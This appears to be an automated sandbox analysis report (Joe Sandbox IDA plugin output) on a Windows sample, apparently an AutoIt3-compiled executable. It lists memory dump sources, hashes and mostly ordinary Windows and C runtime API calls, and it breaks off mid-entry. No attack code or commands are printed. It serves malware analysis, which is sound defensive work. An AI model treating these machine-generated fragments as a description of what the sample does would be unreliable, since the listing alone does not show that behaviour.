                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                        • String ID:
                                                                        • API String ID: 1187119602-0
                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1597257046-0
                                                                        • Opcode ID: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                        • Opcode Fuzzy Hash: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                        • String ID:
                                                                        • API String ID: 237123855-0
                                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyObject$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 3349847261-0
                                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                        • String ID:
                                                                        • API String ID: 2223660684-0
                                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                                        • EndPath.GDI32(?), ref: 00447336
                                                                        • StrokePath.GDI32(?), ref: 00447344
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 2783949968-0
                                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                        APIs
                                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                        • __freeptd.LIBCMT ref: 0041516B
                                                                        • ExitThread.KERNEL32 ref: 00415173
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1454798553-0
                                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _strncmp
                                                                        • String ID: Q\E
                                                                        • API String ID: 909875538-2189900498
                                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 2652923123-3941886329
                                                                        • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                        • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strncmp
                                                                        • String ID: U$\
                                                                        • API String ID: 2666721431-100911408
                                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                        • String ID: LPT
                                                                        • API String ID: 3035604524-1350329615
                                                                        • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                        • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
